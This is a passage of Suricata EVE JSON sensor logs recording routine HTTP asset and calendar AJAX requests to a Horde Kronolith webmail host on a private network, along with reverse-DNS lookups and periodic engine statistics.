Firefox\/73.0","http_content_type":"audio\/x-wav","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":31256},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/sounds\/jetsndb.wav","state":"CLOSED","stored":false,"size":31256,"tx_id":2}} 
{"timestamp":"2020-02-29T00:22:32.471106+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107}} {"timestamp":"2020-02-29T00:22:32.497612+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/buttonbar-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":107},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/buttonbar-bg.png","state":"CLOSED","stored":false,"size":107,"tx_id":3}} {"timestamp":"2020-02-29T00:22:32.497978+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} 
{"timestamp":"2020-02-29T00:22:32.509315+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282}} {"timestamp":"2020-02-29T00:22:32.509535+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560}} {"timestamp":"2020-02-29T00:22:32.509359+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52964,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} 
{"timestamp":"2020-02-29T00:22:32.557018+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37972,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32535,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.582795+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.668240+0000","flow_id":1323200751894490,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37972,"proto":"UDP","dns":{"type":"answer","id":32535,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639}} {"timestamp":"2020-02-29T00:22:32.740698+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":29,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.740787+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listCalendars","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":639},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listCalendars","state":"CLOSED","stored":false,"size":1692,"tx_id":5}} {"timestamp":"2020-02-29T00:22:32.753213+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":56092,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":12947,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:22:32.763804+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/new.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":560},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/new.png","state":"CLOSED","stored":false,"size":560,"tx_id":13}} {"timestamp":"2020-02-29T00:22:32.764123+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52956,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":14,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494}} {"timestamp":"2020-02-29T00:22:32.786769+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/right.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":282},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/right.png","state":"CLOSED","stored":false,"size":282,"tx_id":4}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.864442+0000","flow_id":2245167021588029,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":56092,"proto":"UDP","dns":{"type":"answer","id":12947,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:32.888088+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":53767,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62035,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:32.999298+0000","flow_id":385837024447768,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":53767,"proto":"UDP","dns":{"type":"answer","id":62035,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:22:33.000123+0000","event_type":"stats","stats":{"uptime":15005,"capture":{"kernel_packets":139386,"kernel_drops":0},"decoder":{"pkts":139404,"bytes":95696369,"invalid":194,"ipv4":137843,"ipv6":10,"ethernet":139404,"raw":0,"null":0,"sll":0,"tcp":132311,"udp":5323,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097056},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2867,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2883,"synack":2874,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1886,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2435,"failed_udp":116},"tx":{"http":4842,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2517}},"flow_mgr":{"closed_pruned":2836,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":215062,"memcap":0}}} 
{"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126}} {"timestamp":"2020-02-29T00:22:33.031742+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52960,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":137,"tx_id":5}} {"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044}} 
{"timestamp":"2020-02-29T00:22:33.036872+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52958,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":128,"tx_id":6}} {"timestamp":"2020-02-29T00:22:34.000162+0000","flow_id":202995961277195,"event_type":"flow","src_ip":"192.168.10.130","src_port":34890,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":17,"pkts_toclient":17,"bytes_toserver":2308,"bytes_toclient":12401,"start":"2020-02-29T00:19:53.109323+0000","end":"2020-02-29T00:21:32.815837+0000","age":99,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1a","tcp_flags_tc":"1f","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:37.471121+0000","flow_id":1506488481224280,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52962,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/weekview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":303},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/weekview.png","state":"CLOSED","stored":false,"size":303,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472111+0000","flow_id":1879111253891026,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52966,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/yearview.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":301},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/yearview.png","state":"CLOSED","stored":false,"size":301,"tx_id":0}} {"timestamp":"2020-02-29T00:22:37.472155+0000","flow_id":381567826925203,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52964,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/tasks.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/tasks.png","state":"CLOSED","stored":false,"size":614,"tx_id":1}} 
{"timestamp":"2020-02-29T00:22:37.766816+0000","flow_id":503789711071144,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52956,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/graphics\/loading.gif","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/gif","http_refer":"http:\/\/mail.spiral.com\/kronolith\/themes\/default\/dynamic\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2494},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/graphics\/loading.gif","state":"CLOSED","stored":false,"size":2494,"tx_id":14}} {"timestamp":"2020-02-29T00:22:38.036551+0000","flow_id":12900719167830,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52960,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":126},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":115,"tx_id":5}} {"timestamp":"2020-02-29T00:22:38.041842+0000","flow_id":730770142977525,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52958,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listEvents","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1044},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listEvents","state":"CLOSED","stored":false,"size":2986,"tx_id":6}} {"timestamp":"2020-02-29T00:22:40.000200+0000","event_type":"stats","stats":{"uptime":15012,"capture":{"kernel_packets":139739,"kernel_drops":0},"decoder":{"pkts":139744,"bytes":95945702,"invalid":194,"ipv4":138181,"ipv6":10,"ethernet":139744,"raw":0,"null":0,"sll":0,"tcp":132642,"udp":5330,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2872,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2888,"synack":2879,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1891,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2438,"failed_udp":116},"tx":{"http":4872,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2520}},"flow_mgr":{"closed_pruned":2837,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18511,"memcap_state":0,"memc
ap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:41.398092+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54228,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":24532,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:22:41.509947+0000","flow_id":774372651504396,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54228,"proto":"UDP","dns":{"type":"answer","id":24532,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122}} {"timestamp":"2020-02-29T00:22:41.540149+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52968,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:22:43.003183+0000","flow_id":2063545735567906,"event_type":"flow","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1970,"bytes_toclient":12607,"start":"2020-02-29T00:21:31.907810+0000","end":"2020-02-29T00:21:42.154980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:46.541552+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52968,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} 
{"timestamp":"2020-02-29T00:22:48.000175+0000","event_type":"stats","stats":{"uptime":15020,"capture":{"kernel_packets":139767,"kernel_drops":0},"decoder":{"pkts":139773,"bytes":95948805,"invalid":194,"ipv4":138208,"ipv6":10,"ethernet":139773,"raw":0,"null":0,"sll":0,"tcp":132667,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2838,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18841,"m